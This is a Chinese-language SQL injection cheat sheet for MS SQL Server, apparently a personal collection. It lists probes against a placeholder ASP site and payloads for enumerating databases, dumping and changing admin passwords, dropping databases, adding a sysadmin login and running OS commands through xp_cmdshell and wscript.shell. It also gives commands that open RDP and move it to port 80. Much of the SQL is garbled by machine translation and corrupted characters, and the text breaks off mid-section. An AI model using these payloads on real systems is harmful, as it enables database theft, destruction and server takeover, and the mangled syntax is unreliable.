个人收集整理
和存在(select * from sysobjects)//判断是否是该软件
和存在(从表select *)//判断某表是否存在. .表为表名
, 1=(选择@@VERSION)//该版本
, 1=(选择db_name())//当前数据库名
, 1=(选择@@servername)//本地服务名
, 1=(选择IS_SRVROLEMEMBER (sysadmin))//判断是否是系统管理员
, 1=(选择IS_MEMBER (db_owner))//判断是否是库权限
, 1=(选择HAS_DBACCESS('大师'))//判断是否有库读取权限
和1=(从master.dbo选择名称。sysdatabases dbid=1)//暴库名dbid为1、2、3 ....
;宣布@d int//是否支持多行
和1=(从master.dbo选择count (*)。sysobjects xtype=癤”和name=' xp_cmdshell ')//判断xp_cmdshell是否存在
和1=(从master.dbo选择count (*)。sysobjects name=' xp_regread ')//查看xp_regread扩展存储过程是不是已经被删除
添加和删除一个SA权限的用户测试:(需要SA权限)
exec master.dbo。sp_addlogin测试,
exec master.dbo密码。sp_addsrvrolemember测试,sysadmin
停掉或激活某个服务。(需要SA权限)
执行主. .xp_servicecontrol“停止”,“安排”
执行主. .xp_servicecontrol‘开始’,‘计划’
暴网站目录
create table labeng(拉拉nvarchar (255), id int)
声明@result varchar (255) EXEC master.dbo。xp_regread”HKEY_LOCAL_MACHINE”、“系统\ \ W3SVC \ \ ControlSet001 \服务参数虚拟根”,“/?@result输出插入labeng(拉拉)值(@result);
, 1=(从labeng选择(拉拉)或者,1=(select count(*)从labeng lala> 1)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -分割
DOS下开3389并修改端口号
sc配置termservice开始=autco
净开始termservice
//允许外连
reg添加“HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ \控制终端服务器”/v fDenyTSConnections/t REG_DWORD/d 0 x0/f
//该3389端口到80
reg添加“HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ \控制终端服务器\ WinStations \ RDP-Tcp”/v PortNumber/t 80 REG_DWORD/d/f
SQL Server
判断是否可注射:
http://www.targer.com/article.asp?id=6
http://www.targer.com/article.asp?id=6 '
http://www.targer.com/article.asp?id=6和1=1
http://www.targer.com/article.asp?id=6和1=2
http://www.targer.com/article.asp?action=评分值,1=1
http://www.targer.com/article.asp?action=值”1=2
试用版%’,1=1
试用版% ',1=2
确定数据库类型:
http://www.targer.com/article.asp?id=6和user> 0
http://www.targer.com/article.asp?id=6 (select count(*)从sysobjects)在0
查询当前用户数据信息:
article.asp吗?id=6有1=1,
暴当前表中的列:
article.asp吗?由管理员id=6组。用户名有1=1,
article.asp ?admin.username id=6组的管理。密码有1=1——
暴任意表和列:
和(选择1名(选择前N id,名称来自sysobjects xtype=char (85)) T命令id desc)在1
(选择col_name (object_id (“admin”), N)从sysobjects)在1
暴数据库数据:
和(选择1密码从管理员id=N)在1
修改数据库中的数据:
;更新管理员设置密码=皁ooooo”用户名=皒xx”
增添数据库中的数据:
;插入admin值(xxx, oooooo)
删数据库:
;减少数据库webdata
获取当前数据库用户名:user> 0
获取当前数据库名:和db_name()在0
获取数据库版本:,(选择@@version)在0
判断是否支持多句查询:;宣布@a int -
判断是否支持子查询:和(select count(1)从[sysobjects])在=0
数据库的扩展存储过程:执行主. .xp_cmdshell
查看服务器C盘目录:;exec_master . .xp_cmdshell“dir c: \”
判断扩展存储过程是否存在:并从master.dbo select count (*)。sysobjects xtype=皒”和name=' xp_cmdshell '
恢复扩展存储过程:;exec sp_addextendedproc xp_cmdshell, xplog70。dll '
删除扩展存储过程:;exec sp_dropextendedproc”xp_cmdshell”
是在回中提供了一些函数用于访问OLE对象间接获取权限:
;宣布@ int
; exec sp_oacreat”wscript。壳”,@
;执行主. .spoamethod @,‘快跑’,null, cmd。exe/c dir c: \ "
判断当前数据库用户名是否拥有比较高的权限:
和1=(选择is_srvrolemember (sysadmin))
和1=(选择is_srvrolemember(服务器))
和1=(选择is_srvrolemember (setupadmin))
和1=(选择is_srvrolemember (securityadmin))
和1=(选择is_srvrolemember (diskadmin))
和1=(选择is_srvrolemember (bulkadmin))
判断当前数据库用户名是否为DB_OWNER:
